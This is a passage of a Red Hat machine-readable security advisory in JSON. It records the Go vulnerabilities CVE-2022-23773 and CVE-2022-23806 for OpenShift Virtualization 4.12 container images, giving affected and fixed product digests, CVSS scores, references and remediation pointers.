"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053541" } ], "notes": [ { "category": "description", "text": "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23773" }, { "category": "external", "summary": "RHBZ#2053541", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23773", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23773" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-02-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:0408" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control" }, { "cve": "CVE-2022-23806", "cwe": { "id": "CWE-252", "name": "Unchecked Return Value" }, "discovery_date": "2022-02-11T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2053429" } ], "notes": [ { "category": "description", "text": "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 \u0026 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64" ], "known_not_affected": [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2022-23806" }, { "category": "external", "summary": "RHBZ#2053429", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053429" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2022-23806", "url": "https://www.cve.org/CVERecord?id=CVE-2022-23806" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23806" }, { "category": "external", "summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ" } ], "release_date": "2022-02-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-01-25T11:11:29+00:00", "details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", 